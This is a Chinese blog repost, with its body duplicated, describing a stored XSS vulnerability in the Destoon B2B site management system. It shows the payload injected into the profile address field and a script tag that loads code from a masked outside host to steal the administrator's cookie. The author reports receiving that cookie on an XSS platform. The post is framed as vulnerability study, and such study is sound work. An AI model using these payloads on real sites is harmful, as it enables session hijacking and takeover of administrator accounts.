admin管理员组文章数量:1130349
【漏洞学习——XSS】Destoon B2B网站管理系统存储xss
漏洞简介
Destoon B2B网站管理系统存储xss,可打后台cookie
我们在修改资料的地方插入xss
查看源代码- - 发现没有做任何的过滤
<td class="tr"><input type="text" size="40" name="post[address]" id="daddress" value="\"><script>alert(/xss/)</script>"/> <span id="ddaddress" class="f_red"></span></td>
</tr>
我们既闭合value值,又成功地插入了xss
后台成功触发
因此我们继续,插入盗取cookie的xss代码
/><script src=http://**.**.**.**/RyjbQz8></script>
我们登录到后台查看,我们的xss平台已经收到管理的cookie了哈哈
参见:=145897
【漏洞学习——XSS】Destoon B2B网站管理系统存储xss
漏洞简介
Destoon B2B网站管理系统存储xss,可打后台cookie
我们在修改资料的地方插入xss
查看源代码- - 发现没有做任何的过滤
<td class="tr"><input type="text" size="40" name="post[address]" id="daddress" value="\"><script>alert(/xss/)</script>"/> <span id="ddaddress" class="f_red"></span></td>
</tr>
我们既闭合value值,又成功地插入了xss
后台成功触发
因此我们继续,插入盗取cookie的xss代码
/><script src=http://**.**.**.**/RyjbQz8></script>
我们登录到后台查看,我们的xss平台已经收到管理的cookie了哈哈
参见:=145897
本文标签: 漏洞学习XSSDestoon B2B网站管理系统存储xss
版权声明:本文标题:【漏洞学习——XSS】Destoon B2B网站管理系统存储xss 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://it.en369.cn/IT/1694662508a254706.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。


发表评论